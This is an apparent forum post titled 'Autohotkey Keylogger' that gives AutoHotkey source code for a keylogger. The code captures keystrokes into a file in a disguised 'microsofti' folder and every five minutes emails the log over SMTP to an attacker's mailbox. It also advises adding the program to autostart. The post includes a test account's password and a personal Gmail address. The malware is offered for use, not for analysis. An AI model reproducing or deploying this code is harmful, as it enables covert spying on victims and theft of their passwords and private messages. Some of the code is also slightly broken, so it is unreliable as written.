(Sorry for double Posting)
Autohotkey Keylogger by uwe1337 Version 0.1 xD
Here is an Autohotkey Keylogger
He Sends all 5 minutes to an Email the Log.txt
U Need Autohotkey (its the Programm)
Then u Need 2 Emails, one from
www.hotmail.de (Test1337@hotmail.de password= Test1337 - OnlyTest xD)
Then u need a second email, this is the mail for see the logs... (simon.mashiro1998@gmail.com )
Now here is the Code:
u must edit 5 things
1:sender := "youre2thmail@hotmail.de"
2:senderPass := yourpassword
3:receiver := "your second email addres (here u log in to see the logs)"
4:fields.sendusername := "youre2thmail@hotmail.de"
5:fields.sendpassword := "yourpassword"
SetTimer, SendByEmail, 300000
ProgrammPfad = %A_MyDocuments%\microsofti
IniPfad = %ProgrammPfad%\key.txt
Ifnotexist %ProgrammPfad%
FileCreateDir, %ProgrammPfad%
Input, key, V T1,
FileAppend, %key%, %A_MyDocuments%\microsofti\key.txt
FileRead, Contents, %A_MyDocuments%\microsofti}key.txt
sender := "youre2thmail@hotmail.de"
senderPass := yourpassword
receiver := "your second email addres (here u log in to see the logs)"
subject := "Some New Logs:"
pmsg := ComObjCreate("CDO.Message")
pmsg.From := sender
pmsg.To := receiver
pmsg.BCC := ""
pmsg.CC := ""
pmsg.Subject := subject
fontsize := 2
fontname := "Arial"
font2size := 1
font2name := "Courier New"
pmsg.HtmlBody := "<html><font size= " . fontsize . " face= " . fontname . " ><body><h5>Neue Logs wurden gesendet!</body></h5></font><br><font size= " . font2size . " face= " . font2name . " > " . Contents . " </font></html>"
fields := Object()
fields.smtpserver := "smtp.live.com"
fields.smtpserverport := 25
fields.smtpusessl := True
fields.sendusing := 2
fields.smtpauthenticate := 1
fields.sendusername := "youre2thmail@hotmail.de"
fields.sendpassword := "yourpassword"
fields.smtpconnectiontimeout := 60
schema := "http://schemas.microsoft.com/cdo/configuration/"
pfld := pmsg.Configuration.Fields
For field,value in fields
pfld.Item(schema . field) := value
one thing u can do is the File (keylogger.exe) to copy in the autostart